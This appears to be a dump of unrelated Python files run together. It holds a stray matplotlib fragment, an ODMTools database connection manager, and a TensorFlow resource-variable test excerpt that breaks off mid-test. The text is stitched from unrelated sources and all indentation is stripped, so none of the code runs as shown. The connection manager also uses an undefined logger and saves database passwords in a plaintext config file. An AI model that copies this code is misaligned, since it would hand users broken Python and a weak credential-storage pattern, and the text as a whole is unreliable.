# plt.plot(j_beta_lst, j_vl_loss, 'g')
plt.show()
|
|
import logging
import os
import sys
import urllib
from sqlalchemy.exc import SQLAlchemyError#OperationalError, DBAPIError
#from odmtools.common.logger import LoggerTool
from series_service import SeriesService
from cv_service import CVService
from edit_service import EditService
from odmtools.controller import EditTools
from export_service import ExportService
from odmtools.lib.Appdirs.appdirs import user_config_dir
from odmtools.odmdata.session_factory import SessionFactory
#tool = LoggerTool()
#logger = tool.setupLogger(__name__, __name__ + '.log', 'w', logging.DEBUG)
class ServiceManager():
def __init__(self, debug=False):
self.debug = debug
f = self._get_file('r')
self._conn_dicts = []
self.version = 0
self._connection_format = "%s+%s://%s:%s@%s/%s"
# Read all lines (connections) in the connection.cfg file
while True:
line = f.readline()
if not line:
break
else:
line = line.split()
#logger.debug(line)
if len(line) >= 5:
line_dict = {}
line_dict['engine'] = line[0]
line_dict['user'] = line[1]
line_dict['password'] = line[2]
line_dict['address'] = line[3]
line_dict['db'] = line[4]
self._conn_dicts.append(line_dict)
if len(self._conn_dicts) is not 0:
# The current connection defaults to the most recent (i.e. the last written to the file)
self._current_conn_dict = self._conn_dicts[-1]
else:
self._current_conn_dict = None
f.close()
def get_all_conn_dicts(self):
return self._conn_dicts
def is_valid_connection(self):
if self._current_conn_dict:
conn_string = self._build_connection_string(self._current_conn_dict)
logger.debug("Conn_string: %s" % conn_string)
try:
if self.testEngine(conn_string):
return self.get_current_conn_dict()
except Exception as e:
logger.fatal("The previous database for some reason isn't accessible, please enter a new connection %s" % e.message)
return None
return None
def get_current_conn_dict(self):
return self._current_conn_dict
def set_current_conn_dict(self, dict):
self._current_conn_dict = dict
def add_connection(self, conn_dict):
"""conn_dict must be a dictionary with keys: engine, user, password, address, db"""
# remove earlier connections that are identical to this one
self.delete_connection(conn_dict)
if self.test_connection(conn_dict):
# write changes to connection file
self._conn_dicts.append(conn_dict)
self._current_conn_dict = self._conn_dicts[-1]
self._save_connections()
return True
else:
logger.error("Unable to save connection due to invalid connection to database")
return False
@classmethod
def testEngine(self, connection_string):
s = SessionFactory(connection_string, echo=False)
if 'mssql' in connection_string:
s.ms_test_Session().execute("Select top 1 VariableCode From Variables")
elif 'mysql' in connection_string:
s.my_test_Session().execute('Select "VariableCode" From Variables Limit 1')
elif 'postgresql' in connection_string:
#s.psql_test_Session().execute('Select "VariableCode" From "ODM2"."Variables" Limit 1')
s.psql_test_Session().execute('Select "VariableCode" From "Variables" Limit 1')
return True
def test_connection(self, conn_dict):
try:
conn_string = self._build_connection_string(conn_dict)
if self.testEngine(conn_string) and self.get_db_version(conn_string) == '1.1.1':
return True
except SQLAlchemyError as e:
logger.error("SQLAlchemy Error: %s" % e.message)
raise e
except Exception as e:
logger.error("Error: %s" % e)
raise e
return False
def delete_connection(self, conn_dict):
self._conn_dicts[:] = [x for x in self._conn_dicts if x != conn_dict]
# Create and return services based on the currently active connection
def get_db_version_dict(self, conn_dict):
conn_string = self._build_connection_string(conn_dict)
self.get_db_version(conn_string)
def get_db_version(self, conn_string):
if isinstance(conn_string, dict):
conn_string = self._build_connection_string(conn_string)
service = SeriesService(conn_string)
#if not self.version:
try:
self.version = service.get_db_version()
except Exception as e:
logger.error("Exception: %s" % e.message)
return None
return self.version
def get_series_service(self, conn_dict=""):
conn_string = ""
if conn_dict:
conn_string = self._build_connection_string(conn_dict)
self._current_conn_dict = conn_dict
else:
conn_string = self._build_connection_string(self._current_conn_dict)
return SeriesService(conn_string, self.debug)
def get_cv_service(self):
conn_string = self._build_connection_string(self._current_conn_dict)
return CVService(conn_string, self.debug)
def get_edit_service(self, series_id, connection):
return EditService(series_id, connection=connection, debug=self.debug)
def get_record_service(self, script, series_id, connection):
return EditTools(self, script, self.get_edit_service(series_id, connection),
self._build_connection_string(self.is_valid_connection()))
def get_export_service(self):
return ExportService(self.get_series_service())
## ###################
# private variables
## ###################
def _get_file(self, mode):
#fn = util.resource_path('connection.config')
fn = os.path.join(user_config_dir("ODMTools", "UCHIC"), 'connection.config')
config_file = None
try:
if os.path.exists(fn):
config_file = open(fn, mode)
else:
os.makedirs(user_config_dir("ODMTools", "UCHIC"))
open(fn, 'w').close()
config_file = open(fn, mode)
except:
open(fn, 'w').close()
config_file = open(fn, mode)
return config_file
def _build_connection_string(self, conn_dict):
driver = ""
if conn_dict['engine'] == 'mssql' and sys.platform != 'win32':
driver = "pyodbc"
quoted = urllib.quote_plus('DRIVER={FreeTDS};DSN=%s;UID=%s;PWD=%s;' % (conn_dict['address'], conn_dict['user'], conn_dict['password']))
conn_string = 'mssql+pyodbc:///?odbc_connect={}'.format(quoted)
else:
if conn_dict['engine'] == 'mssql':
driver = "pyodbc"
elif conn_dict['engine'] == 'mysql':
driver = "pymysql"
elif conn_dict['engine'] == 'postgresql':
driver = "psycopg2"
else:
driver = "None"
conn_string = self._connection_format % (
conn_dict['engine'], driver, conn_dict['user'], conn_dict['password'], conn_dict['address'],
conn_dict['db'])
return conn_string
def _save_connections(self):
f = self._get_file('w')
for conn in self._conn_dicts:
f.write("%s %s %s %s %s\n" % (conn['engine'], conn['user'], conn['password'], conn['address'], conn['db']))
f.close()
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.resource_variable_ops."""
import copy
import gc
import os
import pickle
import re
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import full_type_pb2
from tensorflow.core.framework import tensor_pb2
from tensorflow.python.compat import compat as forward_compat
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import cpp_shape_inference_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import memory_checker
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import custom_gradient
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import handle_data_util
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import list_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import momentum
from tensorflow.python.training import saver
from tensorflow.python.training import training_util
from tensorflow.python.util import compat
def _eager_safe_var_handle_op(*args, **kwargs):
# When running in eager mode the `shared_name` should be set to the
# `anonymous_name` to avoid spurious sharing issues. The runtime generates a
# unique name on our behalf when the reserved `anonymous_name` is used as the
# `shared_name`.
if context.executing_eagerly() and "shared_name" not in kwargs:
kwargs["shared_name"] = context.anonymous_name()
return resource_variable_ops.var_handle_op(*args, **kwargs)
@test_util.with_eager_op_as_function
@test_util.with_control_flow_v2
class ResourceVariableOpsTest(test_util.TensorFlowTestCase,
parameterized.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
self.assertEmpty(gc.garbage)
super(ResourceVariableOpsTest, self).tearDown()
@test_util.run_deprecated_v1
def testHandleDtypeShapeMatch(self):
with self.cached_session():
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[])
with self.assertRaises(ValueError):
resource_variable_ops.assign_variable_op(
handle, constant_op.constant(0.0, dtype=dtypes.float32)).run()
with self.assertRaises(ValueError):
resource_variable_ops.assign_variable_op(handle,
constant_op.constant(
[0],
dtype=dtypes.int32)).run()
resource_variable_ops.assign_variable_op(handle,
constant_op.constant(
0,
dtype=dtypes.int32)).run()
@test_util.run_gpu_only
def testGPUInt64(self):
with context.eager_mode(), context.device("gpu:0"):
v = resource_variable_ops.ResourceVariable(1, dtype=dtypes.int64)
self.assertAllEqual(1, v.numpy())
@test_util.run_gpu_only
def testGPUBfloat16(self):
with context.eager_mode(), ops.device("gpu:0"):
v = resource_variable_ops.ResourceVariable(1, dtype=dtypes.bfloat16)
self.assertEqual("/job:localhost/replica:0/task:0/device:GPU:0",
v.device)
self.assertAllEqual(1, v.numpy())
def testEagerNameNotIdentity(self):
with context.eager_mode():
v0 = resource_variable_ops.ResourceVariable(1.0, name="a")
v1 = resource_variable_ops.ResourceVariable(2.0, name="a")
self.assertAllEqual(v0.numpy(), 1.0)
self.assertAllEqual(v1.numpy(), 2.0)
def testEagerNameNotNeeded(self):
with context.eager_mode():
v0 = resource_variable_ops.ResourceVariable(1.0)
self.assertAllEqual(v0.numpy(), 1.0)
def testReadVariableDtypeMismatchEager(self):
with context.eager_mode():
handle = _eager_safe_var_handle_op(
dtype=dtypes.int32, shape=[1], name="foo")
resource_variable_ops.assign_variable_op(handle, 1)
# The error message varies depending on whether it is being raised
# by the kernel or shape inference. The shape inference code path can
# be reached when running in eager op as function mode where each op
# is wrapped in a tf.function.
with self.assertRaisesRegex(
errors.InvalidArgumentError,
r"Trying to read variable with wrong dtype. "
r"Expected (float|int32) got (int32|float)"):
_ = resource_variable_ops.read_variable_op(handle, dtype=dtypes.float32)
def testEagerInitializedValue(self):
with context.eager_mode():
variable = resource_variable_ops.ResourceVariable(1.0, name="eager-init")
self.assertAllEqual(variable.numpy(), 1.0)
self.assertAllEqual(variable.initialized_value().numpy(), 1.0)
def testInitializeVariableUsingInitializedValue(self):
var1 = resource_variable_ops.ResourceVariable(1.0, name="var1")
var2 = resource_variable_ops.ResourceVariable(var1.initialized_value(),
name="var2")
self.assertAllEqual(var2.initialized_value(), 1.0)
def testEagerBool(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(False, name="bool_test")
self.assertAllEqual(bool(v), False)
def testEagerDeepCopy(self):
with context.eager_mode():
init_value = np.ones((4, 4, 4))
variable = resource_variable_ops.ResourceVariable(
init_value,
name="init",
synchronization=variables.VariableSynchronization.ON_READ,
aggregation=variables.VariableAggregation.SUM)
copied_variable = copy.deepcopy(variable)
self.assertEqual(variable.name, copied_variable.name)
self.assertEqual(variable.shape, copied_variable.shape)
self.assertEqual(variable.device, copied_variable.device)
self.assertEqual(variable.synchronization,
copied_variable.synchronization)
self.assertEqual(variable.aggregation, copied_variable.aggregation)
# The copied variable should have the same value as the original.
self.assertAllEqual(variable.numpy(), copied_variable.numpy())
# Updates to the copy should not be reflected in the original.
copied_variable.assign(4 * np.ones((4, 4, 4)))
self.assertNotAllEqual(variable.numpy(), copied_variable.numpy())
@test_util.run_deprecated_v1
def testGraphDeepCopy(self):
with self.cached_session():
init_value = np.ones((4, 4, 4))
variable = resource_variable_ops.ResourceVariable(init_value,
name="init")
with self.assertRaises(NotImplementedError):
copy.deepcopy(variable)
@test_util.run_in_graph_and_eager_modes
def testStridedSliceAssign(self):
v = resource_variable_ops.ResourceVariable([1.0, 2.0])
self.evaluate(variables.global_variables_initializer())
self.evaluate(v[0].assign(2.0))
self.assertAllEqual(self.evaluate(v), [2.0, 2.0])
@test_util.run_in_graph_and_eager_modes
def testVariableShape(self):
v = resource_variable_ops.ResourceVariable([1., 1.])
vshape = resource_variable_ops.variable_shape(v.handle)
self.assertAllEqual(
tensor_util.constant_value(vshape),
[2])
if not context.executing_eagerly():
self.assertEqual("Const", vshape.op.type)
@test_util.run_deprecated_v1
def testDifferentAssignGraph(self):
with ops.Graph().as_default():
v = resource_variable_ops.ResourceVariable(1.0)
ops.reset_default_graph()
v.assign(2.0) # Note: this fails if we run convert_to_tensor on not the
# variable graph.
@test_util.run_deprecated_v1
def testFetchHandle(self):
with self.cached_session():
handle = _eager_safe_var_handle_op(
dtype=dtypes.int32, shape=[1], name="foo")
self.assertNotEmpty(self.evaluate(handle))
@test_util.run_deprecated_v1
def testCachedValueReadBeforeWrite(self):
with self.cached_session() as sess:
v = resource_variable_ops.ResourceVariable(0.0, caching_device="cpu:0")
self.evaluate(v.initializer)
value, _ = sess.run([v, v.assign_add(1.0)])
self.assertAllEqual(value, 0.0)
def testAssignVariableDtypeMismatchEager(self):
with context.eager_mode():
handle = _eager_safe_var_handle_op(
dtype=dtypes.int32, shape=[1], name="foo")
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([1]))
# The error message varies depending on whether it is being raised
# by the kernel or shape inference. The shape inference code path can
# be reached when running in eager op as function mode where each op
# is wrapped in a tf.function.
with self.assertRaisesRegex(
errors.InvalidArgumentError, r"Trying to .* variable with wrong "
r"dtype. Expected int32 got float"):
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([1.], dtype=dtypes.float32))
def testRepr(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(1)
text = "%r" % v
self.assertEqual(
"<tf.Variable 'Variable:0' shape=() dtype=int32, numpy=1>", text)
def testReprUnavailable(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(1)
# Monkey-patch this variable to not have an available value
def broken_read():
raise ValueError("This doesn't work")
v.read_value = broken_read
text = "%r" % v
self.assertEqual("<tf.Variable 'Variable:0' shape=() dtype=int32,"
" numpy=<unavailable>>", text)
def testFormatResourceHandle(self):
with context.eager_mode():
handle = _eager_safe_var_handle_op(
dtype=dtypes.int32, shape=[1], name="foo")
self.assertIn("<ResourceHandle", str(handle))
self.assertIn("<ResourceHandle", repr(handle))
@test_util.run_in_graph_and_eager_modes
def testDtypeSurvivesIdentity(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[])
id_handle = array_ops.identity(handle)
self.evaluate(resource_variable_ops.assign_variable_op(
id_handle, constant_op.constant(0, dtype=dtypes.int32)))
def testUnreadOpName(self):
v = resource_variable_ops.ResourceVariable(1.0)
self.assertNotEqual(v.name, v.assign_add(1.0).name)
@test_util.run_in_graph_and_eager_modes
def testCreateRead(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[])
self.evaluate(resource_variable_ops.assign_variable_op(
handle, constant_op.constant(1, dtype=dtypes.int32)))
value = self.evaluate(
resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32))
self.assertAllEqual(1, value)
@test_util.run_in_graph_and_eager_modes
def testManyAssigns(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[])
create = resource_variable_ops.assign_variable_op(
handle, constant_op.constant(1, dtype=dtypes.int32))
with ops.control_dependencies([create]):
first_read = resource_variable_ops.read_variable_op(
handle, dtype=dtypes.int32)
with ops.control_dependencies([first_read]):
write = resource_variable_ops.assign_variable_op(
handle, constant_op.constant(2, dtype=dtypes.int32))
with ops.control_dependencies([write]):
second_read = resource_variable_ops.read_variable_op(
handle, dtype=dtypes.int32)
f, s = self.evaluate([first_read, second_read])
self.assertEqual(f, 1)
self.assertEqual(s, 2)
@test_util.run_in_graph_and_eager_modes
def testAssignAdd(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[])
self.evaluate(resource_variable_ops.assign_variable_op(
handle, constant_op.constant(1, dtype=dtypes.int32)))
self.evaluate(resource_variable_ops.assign_add_variable_op(
handle, constant_op.constant(1, dtype=dtypes.int32)))
read = self.evaluate(
resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32))
self.assertEqual(read, 2)
@test_util.run_in_graph_and_eager_modes
def testScatterAdd(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_add(
handle, [0], constant_op.constant([[2]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[3]])
@test_util.run_in_graph_and_eager_modes
def testGradientGatherNd(self):
v = resource_variable_ops.ResourceVariable(
np.random.uniform(size=[2, 2]), dtype=dtypes.float32)
with backprop.GradientTape() as tape:
l = array_ops.gather_nd(v, [[1, 1]])
l = math_ops.reduce_sum(l)
grads = tape.gradient(l, v)
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(self.evaluate(grads), [[0., 0.], [0., 1.]])
@test_util.run_deprecated_v1
def testDefaultGradientDtype(self):
v = resource_variable_ops.ResourceVariable(
np.random.uniform(size=[2, 2]), dtype=dtypes.float64)
c = constant_op.constant(1.)
identity = array_ops.identity_n([c, v.handle])
# TODO(b/137403775): Remove this.
handle_data_util.copy_handle_data(v.handle, identity[1])
g = gradients_impl.gradients(identity[0], [c, v.handle])
self.assertEqual(g[1].dtype, dtypes.float64)
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(g[1], [[0., 0.], [0., 0.]])
@test_util.run_deprecated_v1
def testUnconnectedGradientZeros(self):
b = resource_variable_ops.ResourceVariable(initial_value=[[3., 4.]])
c = constant_op.constant(0.)
g = gradients_impl.gradients(c, [b], unconnected_gradients="zero")[0]
self.assertAllEqual(g.shape.as_list(), [1, 2])
@test_util.run_deprecated_v1
def testGradientCondInWhileLoop(self):
v = resource_variable_ops.ResourceVariable(initial_value=1.0)
def cond(i, unused_x):
return i < 1
def body(i, x):
def true():
return x + v
def false():
return 2.0 * v
return i + 1, control_flow_ops.cond(i > 0, true, false)
_, x = control_flow_ops.while_loop(cond, body, [0, 0.0])
# Computing gradients does not produce an exception:
g = gradients_impl.gradients(x, v)
self.evaluate(variables.global_variables_initializer())
# Only the false branch is taken so the gradient is 2.
self.assertAllEqual(g[0], 2.0)
@test_util.run_in_graph_and_eager_modes
def testGradientGatherNdIndexedSlices(self):
v = resource_variable_ops.ResourceVariable(
np.random.uniform(size=[2, 2]), dtype=dtypes.float32)
with backprop.GradientTape() as tape:
l = array_ops.gather_nd(v, [[1], [1]])
l = math_ops.reduce_sum(l)
grads = tape.gradient(l, v)
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(self.evaluate(grads.values), [[1., 1.], [1., 1.]])
@test_util.run_in_graph_and_eager_modes
def testScatterSub(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_sub(
handle, [0], constant_op.constant([[2]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[-1]])
@test_util.run_in_graph_and_eager_modes
def testScatterMul(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_mul(
handle, [0], constant_op.constant([[5]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[5]])
def testEagerPickle(self):
with context.eager_mode():
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, "var.pickle")
with open(fname, "wb") as f:
v = resource_variable_ops.ResourceVariable(
10.0,
dtype=dtypes.float16,
name="v")
pickle.dump(v, f)
with open(fname, "rb") as f:
new_v = pickle.load(f)
self.assertEqual(new_v.name, v.name)
self.assertEqual(new_v.shape, v.shape)
self.assertEqual(new_v.dtype, v.dtype)
self.assertEqual(new_v.trainable, v.trainable)
self.assertAllEqual(new_v.numpy(), v.numpy())
@test_util.run_in_graph_and_eager_modes
def testScatterDiv(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_div(
handle, [0], constant_op.constant([[3]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[2]])
def testUseResource(self):
v = variables.VariableV1(1.0, use_resource=True)
self.assertIsInstance(v, resource_variable_ops.ResourceVariable)
def testEagerNoUseResource(self):
with context.eager_mode():
v = variables.Variable(1.0)
self.assertIsInstance(v, resource_variable_ops.ResourceVariable)
@test_util.run_in_graph_and_eager_modes
def testScatterMin(self):
with ops.device("cpu:0"):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(handle,
constant_op.constant(
[[6]],
dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_min(handle, [0],
constant_op.constant(
[[3]],
dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[3]])
def testMetagraph(self):
with ops.Graph().as_default():
with variable_scope.variable_scope("foo", use_resource=True):
a = variable_scope.get_variable("a", initializer=10.0)
momentum.MomentumOptimizer(
learning_rate=0.001, momentum=0.1).minimize(
a,
colocate_gradients_with_ops=True,
global_step=training_util.get_or_create_global_step())
graph = ops.get_default_graph()
meta_graph_def = saver.export_meta_graph(graph=graph)
with ops.Graph().as_default():
saver.import_meta_graph(meta_graph_def, import_scope="")
meta_graph_two = saver.export_meta_graph(graph=graph)
self.assertEqual(meta_graph_def, meta_graph_two)
@test_util.run_in_graph_and_eager_modes
def testScatterMax(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_max(
handle, [0], constant_op.constant([[3]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[6]])
@test_util.run_in_graph_and_eager_modes
def testScatterAddScalar(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_add(
handle, [0], constant_op.constant(2, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[3]])
@test_util.run_in_graph_and_eager_modes
def testScatterSubScalar(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_sub(
handle, [0], constant_op.constant(2, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[-1]])
@test_util.run_in_graph_and_eager_modes
def testScatterMulScalar(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_mul(
handle, [0], constant_op.constant(5, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[5]])
@test_util.run_in_graph_and_eager_modes
def testScatterDivScalar(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_div(
handle, [0], constant_op.constant(3, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[2]])
@test_util.run_in_graph_and_eager_modes
def testScatterMinScalar(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_min(
handle, [0], constant_op.constant(3, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[3]])
@test_util.run_in_graph_and_eager_modes
def testScatterMaxScalar(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_max(
handle, [0], constant_op.constant(3, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[6]])
@parameterized.parameters(dtypes.float16, dtypes.float32, dtypes.float64)
@test_util.run_in_graph_and_eager_modes
def testScatterAddVariableMethod(self, dtype):
v = resource_variable_ops.ResourceVariable([0.0, 1.5],
name="add",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_add(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([2.5], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 4.0], self.evaluate(v))
@parameterized.parameters(dtypes.float16, dtypes.float32, dtypes.float64)
@test_util.run_in_graph_and_eager_modes
def testScatterSubVariableMethod(self, dtype):
v = resource_variable_ops.ResourceVariable([0.0, 2.5],
name="sub",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_sub(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([1.5], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 1.0], self.evaluate(v))
@parameterized.parameters(dtypes.float16, dtypes.float32, dtypes.float64)
@test_util.run_in_graph_and_eager_modes
def testScatterMaxVariableMethod(self, dtype):
v = resource_variable_ops.ResourceVariable([0.0, 4.0],
name="max1",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_max(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([5.0], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 5.0], self.evaluate(v))
v = resource_variable_ops.ResourceVariable([0.0, 3.5],
name="max2",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_max(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([2.0], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 3.5], self.evaluate(v))
@parameterized.parameters(dtypes.float16, dtypes.float32, dtypes.float64)
@test_util.run_in_graph_and_eager_modes
def testScatterMinVariableMethod(self, dtype):
v = resource_variable_ops.ResourceVariable([0.0, 4.0],
name="min1",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_min(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([5.0], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 4.0], self.evaluate(v))
v = resource_variable_ops.ResourceVariable([0.0, 3.5],
name="min2",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_min(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([2.0], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 2.0], self.evaluate(v))
@parameterized.parameters(dtypes.float16, dtypes.float32, dtypes.float64)
@test_util.run_in_graph_and_eager_modes
def testScatterMulVariableMethod(self, dtype):
v = resource_variable_ops.ResourceVariable([0.0, 4.0],
name="mul",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_mul(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([3.0], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 12.0], self.evaluate(v))
@parameterized.parameters(dtypes.float16, dtypes.float32, dtypes.float64)
@test_util.run_in_graph_and_eager_modes
def testScatterDivVariableMethod(self, dtype):
v = resource_variable_ops.ResourceVariable([0.0, 6.0],
name="div",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_div(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([2.0], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 3.0], self.evaluate(v))
@parameterized.parameters(dtypes.float16, dtypes.float32, dtypes.float64)
@test_util.run_in_graph_and_eager_modes
def testScatterUpdateVariableMethod(self, dtype):
v = resource_variable_ops.ResourceVariable([0.0, 6.0],
name="update",
dtype=dtype)
self.evaluate(variables.global_variables_initializer())
self.evaluate(
v.scatter_update(
indexed_slices.IndexedSlices(
indices=[1], values=constant_op.constant([3.0], dtype=dtype))))
self.assertAllCloseAccordingToType([0.0, 3.0], self.evaluate(v))
@test_util.run_deprecated_v1
def testScatterUpdateString(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.string, shape=[1, 1])
self.evaluate(resource_variable_ops.assign_variable_op(
handle, constant_op.constant([["a"]], dtype=dtypes.string)))
self.evaluate(resource_variable_ops.resource_scatter_update(
handle, [0], constant_op.constant([["b"]], dtype=dtypes.string)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.string)
self.assertEqual(compat.as_bytes(self.evaluate(read)[0][0]),
compat.as_bytes("b"))
@test_util.run_deprecated_v1
def testScatterUpdateStringScalar(self):
handle = _eager_safe_var_handle_op(dtype=dtypes.string, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(handle,
constant_op.constant(
[["a"]],
dtype=dtypes.string)))
self.evaluate(
resource_variable_ops.resource_scatter_update(handle, [0],
constant_op.constant(
"b",
dtype=dtypes.string)))
